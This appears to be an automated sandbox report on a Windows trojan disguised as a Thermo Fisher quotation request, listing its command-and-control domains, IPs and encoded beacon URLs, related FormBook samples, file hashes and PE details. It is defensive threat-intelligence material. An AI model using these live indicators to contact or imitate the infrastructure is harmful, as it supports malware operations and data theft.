www.brightvision.website | 203.161.42.73 | active: true | malicious: false | reputation: unknown
www.madhf.tech | 103.224.182.242 | active: true | malicious: false | reputation: unknown
r0lqcud7.nbnnn.xyz | 202.79.161.151 | active: true | malicious: false | reputation: unknown
logidant.xyz | 45.141.156.114 | active: true | malicious: true | reputation: unknown
www.yunlekeji.top | 106.15.109.33 | active: true | malicious: false | reputation: unknown
www.tals.xyz | 13.248.169.48 | active: true | malicious: true | reputation: unknown
www.zkdamdjj.shop | 104.21.40.167 | active: true | malicious: false | reputation: unknown
www.canadavinreport.site | 185.27.134.206 | active: true | malicious: false | reputation: unknown
aballanet.cat | 134.0.14.158 | active: true | malicious: true | reputation: unknown
www.logidant.xyz | unknown | active: unknown | malicious: true | reputation: unknown
www.laohub10.net | unknown | active: unknown | malicious: false | reputation: unknown
www.aballanet.cat | unknown | active: unknown | malicious: false | reputation: unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.canadavinreport.site/g3h7/?sVC8z=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BXuIfA/6aNcSUPn2xNM4zETNmyU4aFxTXIL5EZw83E41rkQ==&PPP=FHWL56 | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.canadavinreport.site/g3h7/ | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.yunlekeji.top/t322/?PPP=FHWL56&sVC8z=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XX9RPs5/iUffq0tmKE8rYJBtcI2bhCRGcMbzPlb/C9uxVPg== | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.brightvision.website/gn26/?sVC8z=fgpTVhEuh+HnR3p0lfNLmVuUqPxSLN4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd7NMKGX1gMLgBVaz3e9231X82jxOqgG++QmJ2h2W7Ejj4Gw==&PPP=FHWL56 | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.tals.xyz/k1td/ | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.madhf.tech/0mwe/?sVC8z=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg==&PPP=FHWL56 | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.logidant.xyz/iuvu/ | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.zkdamdjj.shop/kf1m/ | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.aballanet.cat/6xrr/?sVC8z=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&PPP=FHWL56 | malicious: true | Avira URL Cloud: safe | reputation: unknown
http://www.logidant.xyz/iuvu/?sVC8z=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5ynY1PA81WB0aqcrP8TCrRqA4T6i/Y0YCRnlTl6YfLJ6nzbiw==&PPP=FHWL56 | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.laohub10.net/36be/?sVC8z=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7tD9cl/byRSbJ8t/R3+K3cKRBXN0bJbe4ZjKihmDBlTXN1Q==&PPP=FHWL56 | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.aballanet.cat/6xrr/ | malicious: true | Avira URL Cloud: safe | reputation: unknown
http://www.laohub10.net/36be/ | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.zkdamdjj.shop/kf1m/?sVC8z=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoRPOyc9x0vhFbku7Ub3qNJZbDXed1slXSq/MHP91YwZ61FA==&PPP=FHWL56 | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.izmirescortg.xyz/lnl7/?sVC8z=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgfVGx56k02tXkAzZldWa3Ro5vlhsr06JocjtffJpgas7XnA==&PPP=FHWL56 | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.tals.xyz/k1td/?sVC8z=oEMxw+ab8QlEZmTmAbDEuuFmAVWx5xMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCVG2YOA5cLjPPS3bUYxhUJeAm1ae/P1TsW9+p+FqZ3lrXmQ==&PPP=FHWL56 | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.brightvision.website/gn26/ | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.madhf.tech/0mwe/ | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.yunlekeji.top/t322/ | malicious: false | Avira URL Cloud: safe | reputation: unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.madhf.tech/0mwe/?sVC8z=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY | uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.00000000035A8000.00000004.00000001.00040000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://duckduckgo.com/chrome_newtab | mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmp | malicious: false | reputation: high
https://duckduckgo.com/ac/?q= | mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmp | malicious: false | reputation: high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmp | malicious: false | reputation: high
http://aballanet.cat/6xrr/?sVC8z=HxJAUmNG5a | mobsync.exe, 00000005.00000002.3904399243.0000000004EA6000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.0000000003416000.00000004.00000001.00040000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmp | malicious: false | reputation: high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmp | malicious: false | reputation: high
https://www.ecosia.org/newtab/ | mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmp | malicious: false | reputation: high
http://www.brightvision.website | uxnRAYhIPZRPiA.exe, 00000006.00000002.3905763155.0000000005333000.00000040.80000000.00040000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://ac.ecosia.org/autocomplete?q= | mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmp | malicious: false | reputation: high
https://zkdamdjj.shop/kf1m/?sVC8z=gD/FPiA75bYZCbZDbB | mobsync.exe, 00000005.00000002.3904399243.0000000005812000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.0000000003D82000.00000004.00000001.00040000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.thinkphp.cn | mobsync.exe, 00000005.00000002.3904399243.000000000535C000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.00000000038CC000.00000004.00000001.00040000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmp | malicious: false | reputation: high
http://www.canadavinreport.site/g3h7/?sVC8z=dyqW | mobsync.exe, 00000005.00000002.3906187965.0000000007290000.00000004.00000800.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3904399243.00000000051CA000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.000000000373A000.00000004.00000001.00040000.00000000.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmp | malicious: false | reputation: high
IP | Domain | Country | ASN | ASN Name | Malicious
45.141.156.114 | logidant.xyz | Germany | 30860 | YURTEH-ASUA | malicious: true
106.15.109.33 | www.yunlekeji.top | China | 37963 | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | malicious: false
13.248.169.48 | www.tals.xyz | United States | 16509 | AMAZON-02US | malicious: true
104.21.40.167 | www.zkdamdjj.shop | United States | 13335 | CLOUDFLARENETUS | malicious: false
203.161.42.73 | www.brightvision.website | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | malicious: false
103.224.182.242 | www.madhf.tech | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | malicious: false
185.27.134.206 | www.canadavinreport.site | United Kingdom | 34119 | WILDCARD-ASWildcardUKLimitedGB | malicious: false
104.21.36.62 | www.izmirescortg.xyz | United States | 13335 | CLOUDFLARENETUS | malicious: true
134.0.14.158 | aballanet.cat | Spain | 197712 | CDMONsistemescdmoncomES | malicious: true
202.79.161.151 | r0lqcud7.nbnnn.xyz | Singapore | 64050 | BCPL-SGBGPNETGlobalASNSG | malicious: false
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1559710
                                                            Start date and time:2024-11-20 21:07:27 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 9m 43s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Run name:Run with higher sleep bypass
Number of new started processes analysed:7
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:2
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe
                                                            renamed because original name is a hash value
                                                            Original Sample Name:Thermo Fisher Scientific - Ajnlatkrs.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@7/3@11/10
                                                            EGA Information:
                                                            • Successful, ratio: 75%
                                                            HCA Information:
                                                            • Successful, ratio: 91%
                                                            • Number of executed functions: 51
                                                            • Number of non-executed functions: 298
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe
                                                            No simulations
Matching IPs in other analyses. Row format: associated sample name / URL (detection, threat name); context
Match:45.141.156.114
• CV_ Filipa Barbosa.exe (malicious, FormBook); context: www.logidant.xyz/ctvu/
Match:13.248.169.48
• DOC_114542366.vbe (malicious, FormBook); context: www.aiactor.xyz/x4ne/?KV=IjUvc9W1zDiNc9PqfXKx1TS0r6LahxQTMxD+2/9txvMkLHbQHvhCPVSp7yYBhZqVsANcjuLc38irD20I6v8c1v1ytT+DEei/9odakMDFYuDWzKGl/p+Lmpo=&Wno=a0qDq
• CV_ Filipa Barbosa.exe (malicious, FormBook); context: www.remedies.pro/hrap/
• SWIFT COPY 0028_pdf.exe (malicious, FormBook); context: www.optimismbank.xyz/lnyv/
• New Order - RCII900718_Contract Drafting.exe (malicious, FormBook); context: www.avalanchefi.xyz/ctta/
• need quotations.exe (malicious, FormBook); context: www.egldfi.xyz/3e55/
• Quotation request -30112024_pdf.exe (malicious, FormBook); context: www.tals.xyz/010v/
• Arrival Notice.exe (malicious, FormBook); context: www.wajf.net/dkz5/
• rG5EzfUhUp.exe (malicious, Sakula RAT); context: www.polarroute.com/newimage.asp?imageid=zcddwc1730788541&type=0&resid=5322796
• dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe (malicious, FormBook); context: www.extrem.tech/ikn1/
• Hire P.O.exe (malicious, FormBook); context: www.sonoscan.org/ew98/
Match:104.21.40.167
• NEW PURCHASE ORDER DRAWINGSSPECS 5655-2024.vbe (malicious, FormBook); context: www.zkdamdjj.shop/wut3/?D6l0F8S=a71d2iXWZwmjtFjuom9eWzv+mdeRMHZm6+v2+EUi1ZskJvHTTp5lIOph9rFSFtMOhpM1XQ/67KJlS/ITLExlGTOPMODybYiKiBVMYz6WSb2v98cStA==&xBhHN=XxBH2Fkx1FgP
Match:203.161.42.73
• need quotations.exe (malicious, FormBook); context: www.trendave.xyz/nhcb/
• PDF PURCHASE INQUIRY PDF.exe (malicious, FormBook); context: www.nexio.life/xsla/
• MV ALIADO-S-REQ-19-000640.exe (malicious, FormBook); context: www.nexio.life/xsla/
• doc330391202408011.exe (malicious, FormBook); context: www.vynix.xyz/bgqc/
• yyyyyyyy.exe (malicious, FormBook); context: www.wyrlo.live/d98v/?EN-hu=LYDXGQwVCoMuYrXSW7MgSssXW4nPW6/lB4t/975EIYDnNxIunPhAyQV+sFLwFKE3iI1OoyaerizxnpL4k+hV3wpy9h6iImSBX/Gothd1bsBJyDzWSA==&zx=TzUh
• MV ALIADO - S-REQ-19-00064 List items.exe (malicious, FormBook); context: www.nexio.life/xsla/
• AUG 2024 SOA.exe (malicious, FormBook); context: www.slyra.xyz/05no/
• MV ALIADO - S-REQ-19-00064.7Z.exe (malicious, FormBook); context: www.nexio.life/xsla/
• 176654 Grade B2FA, BRF-MBO2 & CX2OB.exe (malicious, FormBook); context: www.nexio.life/xsla/
• DN.exe (malicious, FormBook); context: www.slyra.xyz/05no/
Matching domains in other analyses. Row format: associated sample name / URL (detection, threat name); context
Match:www.zkdamdjj.shop
• NEW PURCHASE ORDER DRAWINGSSPECS 5655-2024.vbe (malicious, FormBook); context: 104.21.40.167
• A2028041200SD.exe (malicious, FormBook); context: 188.114.97.3
Match:www.madhf.tech
• SWIFT COPY 0028_pdf.exe (malicious, FormBook); context: 103.224.182.242
• Item-RQF-9456786.exe (malicious, Unknown); context: 103.224.182.242
Match:r0lqcud7.nbnnn.xyz
• RFQ 3100185 MAHAD.exe (malicious, FormBook); context: 27.124.4.246
• New Order - RCII900718_Contract Drafting.exe (malicious, FormBook); context: 23.225.159.42
Match:www.tals.xyz
• Quotation request -30112024_pdf.exe (malicious, FormBook); context: 13.248.169.48
Matching ASNs in other analyses. Row format: associated sample name / URL (detection, threat name); context
Match:CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
• arm4.elf (malicious, Mirai); context: 121.40.31.154
• Lee.6B4k4ja1.exe.part.exe (malicious, CobaltStrike); context: 101.133.156.69
• Label_00750700.doc.js (malicious, Unknown); context: 101.200.53.150
• x86_32.nn.elf (malicious, Mirai, Okiru); context: 8.177.239.137
• mipsel.nn.elf (malicious, Mirai, Okiru); context: 120.77.2.43
• x86_64.nn.elf (malicious, Mirai, Okiru); context: 120.25.240.221
• arm5.nn.elf (malicious, Mirai, Okiru); context: 106.14.155.225
• owari.sh4.elf (malicious, Unknown); context: 8.135.254.111
• owari.x86.elf (malicious, Unknown); context: 8.159.102.60
• mips.elf (malicious, Mirai); context: 8.191.184.118
Match:CLOUDFLARENETUS
• file.exe (malicious, Amadey, Stealc, Vidar); context: 172.64.41.3
• file.exe (malicious, LummaC); context: 104.21.66.38
• https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html (malicious, Gabagool); context: 104.17.25.14
• file.exe (malicious, LummaC); context: 172.67.206.172
• PNSBt.js (malicious, AsyncRAT); context: 172.67.187.200
• LETA_pdf.vbs (malicious, AsyncRAT, PureLog Stealer); context: 172.67.187.200
• YyA4O1TBSW.dll (malicious, Unknown); context: 104.21.93.38
• zlibwapi.dll.dll (malicious, Unknown); context: 172.67.204.56
• YyA4O1TBSW.dll (malicious, Unknown); context: 104.21.93.38
• zlibwapi.dll.dll (malicious, Unknown); context: 172.67.204.56
Match:AMAZON-02US
• file.exe (malicious, Amadey, Stealc, Vidar); context: 108.139.47.108
• Fax-494885 Boswell Automotive Group.xlsx (malicious, Unknown); context: 13.227.8.87
• Fax-494885 Boswell Automotive Group.xlsx (malicious, Unknown); context: 3.128.89.23
• https://ambir.com/ (malicious, CAPTCHA Scam ClickFix); context: 54.250.95.82
• https://safelinks.mygo1.com/ls/click?upn=u001.1mDt7ytPYCJSVG-2BhF04Stdj4cHPTtKuY-2FmURzzu8QTldxw-2FzpyQYTJMxn3CPFnnsIuOY-2F5ruiOS6FLjm58JljkOmonXKnT8iwwYmA30I9bsERP5vx05gL85c3Lc-2F9WrpUfyNz12kcqjd3wt6WtaxLWxoHc5J3Zua9xQUurCc2AIjJtnP8Xu6Otzn8DBWsS0QPl2WC-2FCyrpDHulFvP0eEWn9IDo-2BqFc1GmD1SsVw5lRKY6yWeuyFQhUWIqZ4VCAeEroA6Ndqh9iaNvFz0XzERrEFYNTxkPirSQWkw6YqX5uo-3DaVWv_h5yw3DykLZfOpXzx776oAcLdVv6tuK-2FE7nfoR01CbnMOUH4fGhxn3KVtBew-2BRfJoKGgpvyhjBTXBTw1J6hN0wi-2FkZpowy1W9-2BTe-2Bf57Ts50FCXINRnefXkQ-2FFO3hKPeSa4hJKnd-2Bpj-2F7GS6r3Uq0ucRRb6izhExkinWfndIosIP-2Ff06hq3eO6ged-2F-2FYA1ldX-2BK4wuZipA-2BXRgTIkXvTbKj74iEMllOxCNkgoQZE3mKkIMM6o0L-2FNgq5TR8KcWZzS-2BEoZ1Oyop5AmC8zRE1SSKfnZ-2F0g1qg2dir-2F788Fq8CtpqmRpkFaF34nQcSYSfbixDSj0B5gj0fuY43UiPKR2D9s0w8lZaDR5dDYOswzPttauCIiIjiyfK20I-2BA4JjKFg (malicious, Unknown); context: 3.108.189.24
• m68k.elf (malicious, Mirai); context: 18.153.209.52
• http://interpro.wisc.edu/courses/maintaining-asphalt-pavements/?utm_source=Brochure&utm_medium=postal&utm_campaign=D487&utm_term=SHB&utm_content=Sep (malicious, Unknown); context: 13.227.8.87
• x86_64.elf (malicious, Mirai); context: 108.150.67.198
• i486.elf (malicious, Mirai); context: 13.225.74.211
• mpsl.elf (malicious, Mirai); context: 108.136.213.161
Match:VNPT-AS-VNVNPTCorpVN
• ppc.elf (malicious, Mirai); context: 14.245.235.111
• x86_64.elf (malicious, Mirai); context: 123.25.106.125
• i486.elf (malicious, Mirai); context: 113.175.131.151
• DOC_114542366.vbe (malicious, FormBook); context: 203.161.43.228
• A2028041200SD.exe (malicious, FormBook); context: 202.92.5.23
• SWIFT COPY 0028_pdf.exe (malicious, FormBook); context: 203.161.46.205
• need quotations.exe (malicious, FormBook); context: 203.161.42.73
• exe009.exe (malicious, Emotet); context: 113.161.148.81
• 5674656777985-069688574654 pdf.exe (malicious, FormBook); context: 203.161.46.205
• MV KODCO.exe (malicious, FormBook); context: 203.161.49.193
Match:YURTEH-ASUA
• CV_ Filipa Barbosa.exe (malicious, FormBook); context: 45.141.156.114
• support.Client.exe (malicious, ScreenConnect Tool); context: 31.42.187.210
• support.Client.exe (malicious, ScreenConnect Tool); context: 31.42.187.210
• SI HE Voy - TC Relet 11.docx.scr.exe (malicious, AgentTesla); context: 152.89.61.240
• MV ALEXOS_VESSEL'S DESC.docx.scr.exe (malicious, AgentTesla); context: 152.89.61.240
• https://r2.ddlnk.net/c/AQj0-RUQuwkYipioASC0cRmrHeGLBOb7t9m7_CWaa81LkCY1aSe2ilmnvwK5PXzQ (malicious, Unknown); context: 152.89.61.240
• https://campaign-statistics.com/link_click/OOIhh4OKHe_NcHPG/8cb76dcdebff138ed04c1331049114e6 (malicious, Unknown); context: 152.89.61.240
• https://campaign-statistics.com/link_click/ODQJBme7yo_NcFtX/22e0ea1236db29f11ee5970fcc1e783c (malicious, Unknown); context: 152.89.61.240
• https://discountdays.ru/ (malicious, Unknown); context: 31.42.186.237
• rC-P-0000054697.exe (malicious, FormBook); context: 152.89.61.240
                                                            Process:C:\Windows\SysWOW64\mobsync.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Process:C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):287232
                                                            Entropy (8bit):7.996070165551948
                                                            Encrypted:true
                                                            SSDEEP:6144:n7el2uClot4eDP1LS1IyJICdZTrPTdtJ6zhtlvTpp16+51Aja2:n7EClohD12WyCCDTXdtozhtJTv16+Ijx
                                                            MD5:6312BE8E131D2B7342EBDD0C1E4FE151
                                                            SHA1:2607A0C691260292B0A5DE028E22B183F22A2617
                                                            SHA-256:CD3E6B088EBB686FCFFA7025668EBE9C550A5FA2F1AAC8A669D571496CDA792F
                                                            SHA-512:C50CB856E077EC3FDB0ED5BC58132AEE9519D07587B1E4971DB57583F217D19C1B1255E91E0BF5C02399D2E3C8C35922F9F3667D6D31B07CFF5A937E2994ADC3
                                                            Malicious:false
                                                            Reputation:low
                                                            Process:C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):287232
                                                            Entropy (8bit):7.996070165551948
                                                            Encrypted:true
                                                            SSDEEP:6144:n7el2uClot4eDP1LS1IyJICdZTrPTdtJ6zhtlvTpp16+51Aja2:n7EClohD12WyCCDTXdtozhtJTv16+Ijx
                                                            MD5:6312BE8E131D2B7342EBDD0C1E4FE151
                                                            SHA1:2607A0C691260292B0A5DE028E22B183F22A2617
                                                            SHA-256:CD3E6B088EBB686FCFFA7025668EBE9C550A5FA2F1AAC8A669D571496CDA792F
                                                            SHA-512:C50CB856E077EC3FDB0ED5BC58132AEE9519D07587B1E4971DB57583F217D19C1B1255E91E0BF5C02399D2E3C8C35922F9F3667D6D31B07CFF5A937E2994ADC3
                                                            Malicious:false
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.140293457148055
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe
                                                            File size:1'208'320 bytes
                                                            MD5:dd888983c289f26094548b42ac5b6c85
                                                            SHA1:a1893cba8b45a0294340419f03e05140f0b62c3b
                                                            SHA256:3eace816daaec69a4652ce191c0369a0ce5aa933a38d68996e089e8949e46c3d
                                                            SHA512:e84aeb3aa9749b6a7d9cfd1f753c02fc87fdf8754c46e7295c1391e62273ce57c135a09519499b88d76655597b4d66c378a5086c10bcf413ba6ce69f66b8e42c
SSDEEP: 24576:9tb20pkaCqT5TBWgNQ7aQBXc9A9HHYLnPh2VQ7hxtf6A:uVg5tQ7aQm9BjZvF5
TLSH: A945CF1373DE8361C7B25273BA25B701AEBF782506A5F86B2FD8093DF920121525E673
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x425f74
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x673DC1BE [Wed Nov 20 11:02:22 2024 UTC]
TLS Callbacks: (none)
CLR (.Net) Version: (none)
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 3d95adbf13bbe79dc24dccb401c12091
Instruction (entrypoint disassembly):
    call 00007F3EBD106ACFh
    jmp 00007F3EBD0F9AE4h
    int3
    int3
    push edi
    push esi
    mov esi, dword ptr [esp+10h]
    mov ecx, dword ptr [esp+14h]
    mov edi, dword ptr [esp+0Ch]
    mov eax, ecx
    mov edx, ecx
    add eax, esi
    cmp edi, esi
    jbe 00007F3EBD0F9C6Ah
    cmp edi, eax
    jc 00007F3EBD0F9FCEh
    bt dword ptr [004C0158h], 01h
    jnc 00007F3EBD0F9C69h
    rep movsb
    jmp 00007F3EBD0F9F7Ch
    cmp ecx, 00000080h
    jc 00007F3EBD0F9E34h
    mov eax, edi
    xor eax, esi
    test eax, 0000000Fh
    jne 00007F3EBD0F9C70h
    bt dword ptr [004BA370h], 01h
    jc 00007F3EBD0FA140h
    bt dword ptr [004C0158h], 00000000h
    jnc 00007F3EBD0F9E0Dh
    test edi, 00000003h
    jne 00007F3EBD0F9E1Eh
    test esi, 00000003h
    jne 00007F3EBD0F9DFDh
    bt edi, 02h
    jnc 00007F3EBD0F9C6Fh
    mov eax, dword ptr [esi]
    sub ecx, 04h
    lea esi, dword ptr [esi+04h]
    mov dword ptr [edi], eax
    lea edi, dword ptr [edi+04h]
    bt edi, 03h
    jnc 00007F3EBD0F9C73h
    movq xmm1, qword ptr [esi]
    sub ecx, 08h
    lea esi, dword ptr [esi+08h]
    movq qword ptr [edi], xmm1
    lea edi, dword ptr [edi+08h]
    test esi, 00000007h
    je 00007F3EBD0F9CC5h
    bt esi, 03h
    jnc 00007F3EBD0F9D18h
    movdqa xmm1, dqword ptr [esi+00h]
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2012 UPD4 build 61030
• [RES] VS2012 UPD4 build 61030
• [LNK] VS2012 UPD4 build 61030
Data directories:
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x5de54 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x122000 | 0x6c4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections:
